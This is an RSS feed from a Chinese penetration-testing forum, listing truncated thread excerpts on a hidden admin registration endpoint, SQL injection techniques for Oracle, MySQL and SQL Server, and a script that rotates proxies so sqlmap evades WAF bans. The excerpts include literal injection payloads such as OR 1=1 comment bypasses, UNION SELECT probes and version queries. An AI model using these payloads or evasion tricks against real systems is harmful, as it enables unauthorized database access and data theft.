<?xml version="1.0" encoding="gbk"?>
<rss version="2.0">
  <channel>
    <title>中国白客联盟 - 渗透入侵（Hacker attacks）</title>
    <link>http://www.chinabaiker.com/forum-41-1.html</link>
    <description>Latest 20 threads of 渗透入侵（Hacker attacks）</description>
    <copyright>Copyright(C) 中国白客联盟</copyright>
    <generator>Discuz! Board by Comsenz Inc.</generator>
    <lastBuildDate>Fri, 17 Apr 2026 09:40:40 +0000</lastBuildDate>
    <ttl>60</ttl>
    <image>
      <url>http://www.chinabaiker.com/static/image/common/logo_88_31.gif</url>
      <title>中国白客联盟</title>
      <link>http://www.chinabaiker.com/</link>
    </image>
    <item>
      <title>最后一个登陆框引起的血案</title>
      <link>http://www.chinabaiker.com/thread-3358-1-1.html</link>
      <description><![CDATA[原文链接：https://www.freebuf.com/vuls/219210.html
0×00 文章内容结构图0×01 管理后台隐藏的注册接口很多系统的后台会用一些本身存在注册功能，但是在后续正式使用的时候，开发人员为了图省事，仅仅删除前端显示的 ...]]></description>
      <category>渗透入侵（Hacker attacks）</category>
      <author>admin</author>
<enclosure url="http://www.chinabaiker.com/data/attachment/forum/201911/11/150023l3lgflx9j3mu5uxx.jpg" length="88883" type="image/jpeg" />      <pubDate>Mon, 11 Nov 2019 07:00:23 +0000</pubDate>
    </item>
    <item>
      <title>数据库的一些注入技巧-Oracle</title>
      <link>http://www.chinabaiker.com/thread-3357-1-1.html</link>
      <description><![CDATA[默认数据库
注释--
SELECT * FROM Users WHERE username = \'\' OR1=1 --\' AND password = \'\';
查询版本信息

数据库凭证
查询数据库信息查询当前库

用户数据库
主机名称
查询表和列查询表

查询列SELECT column_name FROMall_tab_columns;
从列中查询表SEL ...]]></description>
      <category>渗透入侵（Hacker attacks）</category>
      <author>admin</author>
      <pubDate>Sat, 09 Nov 2019 09:51:09 +0000</pubDate>
    </item>
    <item>
      <title>数据库的一些注入技巧-mysql</title>
      <link>http://www.chinabaiker.com/thread-3355-1-1.html</link>
      <description><![CDATA[默认数据库

尝试注入
False表示查询无效（mysql语句错误/网页内容为空/与原页面不一致）True表示查询有效（网页内容与原先一致）
字符串型
漏洞语句：select * from table where id = ‘1’;

例子：
SELECT * FROMArticles WHERE id = \'1\'\'\';SELECT 1 FROM du ...]]></description>
      <category>渗透入侵（Hacker attacks）</category>
      <author>admin</author>
      <pubDate>Wed, 06 Nov 2019 12:07:45 +0000</pubDate>
    </item>
    <item>
      <title>数据库的一些注入技巧-sqlserver</title>
      <link>http://www.chinabaiker.com/thread-3354-1-1.html</link>
      <description><![CDATA[默认数据库


注释
SELECT * FROM Users WHERE username = \'\' OR 1=1 --\' AND password =\'\';SELECT * FROM Users WHERE id = \'\' UNION SELECT 1, 2, 3/*\';
查询版本信息@@VERSION
SELECT * FROM Users WHERE id = \'1\' AND @@VERSION LIKE\'%2008%\';

查询数据库 ...]]></description>
      <category>渗透入侵（Hacker attacks）</category>
      <author>admin</author>
      <pubDate>Wed, 06 Nov 2019 12:06:57 +0000</pubDate>
    </item>
    <item>
      <title>Sqlmap自动切换代理</title>
      <link>http://www.chinabaiker.com/thread-3352-1-1.html</link>
      <description><![CDATA[大家经常可能遇到，用sqlmap跑某些注入的时候，因为网络、waf等问题造成被拦截、跑失败等情况。
因此下面这个脚本可以做到sqlmap自动切换代理，防止被ban。
使用教程如下

1、在ips.txt中存入可用的代理，格式如下1.1.1.1:10802.2.2.2:99883.3.3.3:1100
2、运行脚 ...]]></description>
      <category>渗透入侵（Hacker attacks）</category>
      <author>admin</author>
      <pubDate>Wed, 06 Nov 2019 12:05:49 +0000</pubDate>
    </item>
  </channel>
</rss>